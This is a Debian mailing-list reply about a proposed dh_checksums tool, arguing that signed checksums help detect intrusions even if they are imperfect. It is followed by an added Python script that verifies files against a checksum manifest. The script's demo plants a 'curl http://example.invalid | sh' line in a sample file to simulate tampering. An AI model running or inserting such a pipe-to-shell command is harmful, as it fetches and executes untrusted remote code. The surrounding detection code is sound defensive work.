Re: Bug#540215: Introduce dh_checksums
Harald Braumann <firstname.lastname@example.org> writes:
> On Mon, Mar 08, 2010 at 05:59:13PM -0500, Joey Hess wrote:
>> That's one missing link. The other one is that there are innumerable
>> ways for an attacker to inject bad behavior/backdoors onto a system
>> without touching binaries originating from dpkg.
> Signatures don't prevent bugs, they don't prevent trojans, they don't
> prevent attacks on SSH. But they let you *detect* attacks. It's not that
> easy to install a root kit that hides all changes and you can always
> boot from a trusted medium to check your files. Without signatures, you
> can't, or at least it's a lot harder.

It's also always worth bearing in mind that while a really good attacker
can do all sorts of complex things that make them very hard to find, most
attackers are stupid and straightforward. We should always be striving
for the best possible security and improving security measures, but along
the way security measures that have weaknesses against a determined
attacker can still be practically useful.

It's a constant balance to not sacrifice real security for expediency, but
at the same time to not discard tools that are already available and
deployable just because they can't catch the most determined attackers.

*Some* checking is better than *no* checking as long as you clearly
understand what the capabilities and tradeoffs of the system you have are
and don't think they're more than what they are.

There are very, very few absolutes in computer security.

Russ Allbery (email@example.com) <http://www.eyrie.org/~eagle/>
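As an added illustration of the offline check Harald describes (not code from this thread or from dh_checksums): a small Python checker that compares files on disk against a checksum manifest and reports each one as ok, modified or missing. It assumes the manifest uses the dpkg md5sums layout of one "<sha256hex>  <path>" line per file, and that the manifest itself was obtained from a trusted medium; verifying the signature that establishes that is outside this snippet.

```python
import hashlib
import os
import tempfile

# Assumed manifest layout (modelled on dpkg's md5sums files):
# one "<sha256hex>  <relative/path>" line per file, two spaces between.
def parse_manifest(text):
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, path = line.partition("  ")
        if len(digest) != 64 or not path:
            raise ValueError("malformed manifest line: %r" % line)
        entries[path] = digest.lower()
    return entries

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_tree(root, manifest):
    """Return {path: "ok" | "modified" | "missing"} for every manifest entry.
    The manifest is assumed to come from a trusted medium; its own
    authenticity (the signature) is not checked here."""
    result = {}
    for rel, expected in manifest.items():
        full = os.path.join(root, rel)
        if not os.path.isfile(full):
            result[rel] = "missing"
        elif sha256_file(full) != expected:
            result[rel] = "modified"
        else:
            result[rel] = "ok"
    return result

def demo():
    # Constructed sample tree: two real files, one listed file that is absent,
    # then the binary is tampered with after the manifest was written.
    root = tempfile.mkdtemp()
    files = {"usr/bin/tool": b"#!/bin/sh\necho hello\n", "etc/tool.conf": b"mode=safe\n"}
    lines = ["%s  lib/missing.so" % hashlib.sha256(b"").hexdigest()]
    for rel, data in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)
        lines.append("%s  %s" % (hashlib.sha256(data).hexdigest(), rel))
    with open(os.path.join(root, "usr/bin/tool"), "ab") as f:
        f.write(b"curl http://example.invalid | sh\n")  # simulated tampering
    return verify_tree(root, parse_manifest("\n".join(lines)))
```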